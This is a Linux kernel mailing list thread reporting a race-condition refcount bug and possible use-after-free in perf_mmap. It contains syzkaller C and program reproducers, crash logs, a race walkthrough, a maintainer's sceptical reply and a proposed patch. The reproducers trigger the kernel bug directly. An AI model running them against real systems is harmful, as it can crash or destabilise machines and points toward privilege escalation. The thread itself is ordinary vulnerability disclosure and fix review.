NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Mon, Feb 02, 2026 at 02:58:59PM +0100, Peter Zijlstra wrote:
I'm not seeing it; once perf_mmap_rb() completes, we should have
event->mmap_count != 0, and this the IOC_SET_OUTPUT will fail.
Please provide a better explanation.
|
{
"author": "Peter Zijlstra <peterz@infradead.org>",
"date": "Mon, 2 Feb 2026 15:36:15 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
